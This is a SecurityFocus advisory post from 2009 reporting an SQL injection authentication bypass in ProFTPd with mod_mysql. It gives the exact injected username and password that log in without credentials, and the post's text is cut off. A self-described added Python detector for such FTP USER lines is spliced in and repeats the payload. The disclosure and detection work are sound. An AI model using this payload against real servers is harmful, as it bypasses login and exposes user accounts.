Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)
Feb 10 2009 07:49PM
gat3way gat3way eu
Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you log in with a username like:
USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
and a password of "1" (without quotes), which leads to a successful login. Differ...
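As an added defensive example (not part of the original post and not ProFTPD code), the following checks FTP `USER` command lines against a login-name allowlist and reports which SQL metacharacters from the username quoted above are present. The allowlist pattern, the function names and the sample session lines are assumptions constructed for illustration; such a filter is a detection and compensating control, not a fix for the server-side flaw.

```python
import re

# Assumption: local policy limits FTP login names to this conservative set.
ALLOWED_USER = re.compile(r"[A-Za-z0-9._-]{1,32}")

# Indicators taken from the username quoted in the post above.
INDICATORS = {
    "percent": re.compile(r"%"),
    "quote": re.compile(r"['\"]"),
    "sql_comment": re.compile(r"--|/\*|#"),
    "statement_separator": re.compile(r";"),
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE),
}

USER_CMD = re.compile(r"\s*USER\s+(.*?)\s*", re.IGNORECASE)


def parse_user_command(line):
    """Return the argument of an FTP USER command, or None for other lines."""
    match = USER_CMD.fullmatch(line)
    return match.group(1) if match else None


def check_user_line(line):
    """Classify one control-channel line; None if it is not a USER command."""
    user = parse_user_command(line)
    if user is None:
        return None
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(user))
    allowed = ALLOWED_USER.fullmatch(user) is not None
    return {"user": user, "allowed": allowed, "indicators": hits}


def rejected_logins(lines):
    """Return the findings for every USER line that fails the allowlist."""
    results = (check_user_line(line) for line in lines)
    return [r for r in results if r is not None and not r["allowed"]]


# Constructed sample session lines (not captured traffic).
SAMPLE = [
    "USER alice\r\n",
    "PASS 1\r\n",
    "USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --\r\n",
    "USER bob.smith\r\n",
]

if __name__ == "__main__":
    for finding in rejected_logins(SAMPLE):
        print(finding["user"], "->", ", ".join(finding["indicators"]))
```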
Copyright 2010, SecurityFocus